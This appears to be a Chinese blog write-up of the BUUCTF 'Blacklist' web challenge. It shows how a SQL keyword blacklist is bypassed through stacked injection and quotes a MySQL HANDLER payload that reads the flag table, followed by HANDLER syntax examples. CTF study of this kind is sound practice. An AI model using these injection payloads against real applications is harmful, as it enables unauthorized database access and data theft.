BUU web Blacklist

添加1’ 报错确定存在sql注入
提交 1’# 返回正常
但提交 1’select# 返回黑名单

禁用了太多,考虑堆叠注入
查库

查出表名

查字段名

但由于禁用了select,prepare等关键字,后面就不知道怎么做了
于是翻了大佬的wp:
发现HANDLER查询性能好像比SELECT还更好,且未被过滤
附上大佬的payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

handler的使用:
HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE
//其中 HANDLER tbl_name OPEN AS example
//其后 HANDLER example READ index_name="example2"

几个栗子:
mysql> handler test open as c; //打开
Query OK, 0 rows affected (0.01 sec)

mysql> handler c read PRIMARY=(5); //查询主健
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 5 | def | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler c close; //关闭
Query OK, 0 rows affected (0.00 sec)

mysql> handler test open; //open
Query OK, 0 rows affected (0.00 sec)

mysql> handler test read data first; //data索引,第一个记录
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data next; //下一个记录
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data prev; //前一个记录
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)

mysql> handler test read data last; //最后一条记录
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.00 sec)

mysql> handler test read data=("yza");
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 9 | yza | 2016-07-18 23:44:05 |
+----+------+---------------------+
1 row in set (0.01 sec)

mysql> handler test read data=("abc") limit 5;
+----+------+---------------------+
| id | data | ts |
+----+------+---------------------+
| 1 | abc | 2016-07-18 23:44:05 |
| 2 | abc | 2016-07-18 23:44:05 |
+----+------+---------------------+
2 rows in set (0.00 sec)

posted @ 2020-11-29 16:01  努力的菜鸟Fang  阅读(62)  评论(0编辑  收藏  举报